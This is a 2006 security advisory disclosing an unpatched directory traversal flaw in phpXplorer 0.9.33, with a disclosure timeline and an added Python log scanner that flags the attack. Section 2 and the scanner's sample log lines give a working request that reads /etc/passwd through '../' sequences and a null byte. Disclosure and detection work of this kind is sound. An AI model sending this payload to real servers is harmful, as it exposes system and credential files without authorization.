adv20060116.txt

Date: 21 Jan 2006 | Reported by: Oriol Torrent Santiago | Type: packetstorm | Source: packetstormsecurity.com

Directory traversal in phpXplorer allows attackers to read arbitrary files outside web roo

`==========================================================  
Title: Directory traversal in phpXplorer  
  
Application: phpXplorer  
Vendor: http://www.phpxplorer.org  
Vulnerable Versions: 0.9.33  
Bug: directory traversal  
Date: 16-January-2006  
Author: Oriol Torrent Santiago < oriol.torrent.AT.gmail.com >  
  
References:  
http://www.arrelnet.com/advisories/adv20060116.html  
  
==========================================================  
  
1) Background  
-----------  
phpXplorer is an open source file management system written in PHP.  
It enables you to work on a remote file system through a web browser.  
  
  
2) Problem description  
--------------------  
An attacker can read arbitrary files outside the web root by sending  
specially formed requests.  
  
Ex:  
  
http://host/phpXplorer/system/workspaces.php?sShare=../../../../../../../../etc/passwd%00&ref=1  
  
  
3) Solution:  
----------  
No Patch available.  
  
  
4) Timeline  
---------  
17/12/2005 Bug discovered  
20/12/2005 Vendor receives detailed advisory. No response  
04/01/2006 Second notification. No response  
16/01/2006 Public Disclosure  
`
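
A defender-side check for the request pattern in section 2, as an added example that is not part of the original advisory: it scans web access logs for `workspaces.php` requests whose `sShare` value contains a `..` path segment or a NUL byte after percent-decoding. The log lines are constructed samples; the function names and the common-log line format are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_to_bytes

# Constructed sample access-log lines (common log format assumed, not from the advisory).
SAMPLE_LOG = [
    '203.0.113.5 - - [16/Jan/2006:10:00:01 +0000] "GET /phpXplorer/system/workspaces.php?sShare=docs&ref=1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [16/Jan/2006:10:00:03 +0000] "GET /phpXplorer/system/workspaces.php?sShare=release..notes&ref=1 HTTP/1.1" 200 530',
    '203.0.113.9 - - [16/Jan/2006:10:00:07 +0000] "GET /phpXplorer/system/workspaces.php?sShare=../../../../../../../../etc/passwd%00&ref=1 HTTP/1.1" 200 1843',
    '203.0.113.7 - - [16/Jan/2006:10:00:09 +0000] "GET /index.php?page=../about HTTP/1.1" 200 77',
]
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def normalize(raw, max_rounds=3):
    """Percent-decode repeatedly so nested encodings are inspected in decoded form."""
    data = raw.encode("utf-8")
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    return data

def findings(value):
    """Return the suspicious traits found in one raw sShare value."""
    data = normalize(value)
    hits = []
    if b"\x00" in data:
        hits.append("nul-byte")
    # Only a whole '..' path segment counts, so 'release..notes' stays clean.
    if b".." in re.split(rb"[/\\\x00]", data):
        hits.append("dot-dot-segment")
    return hits

def scan_line(line):
    """Return (client, hits) for a flagged workspaces.php request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.endswith("/workspaces.php"):
        return None
    for pair in url.query.split("&"):  # raw split: values stay undecoded here
        name, _, value = pair.partition("=")
        hits = findings(value) if name == "sShare" else []
        if hits:
            return (line.split()[0], hits)
    return None

def scan(lines):
    return [hit for hit in map(scan_line, lines) if hit]
```
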
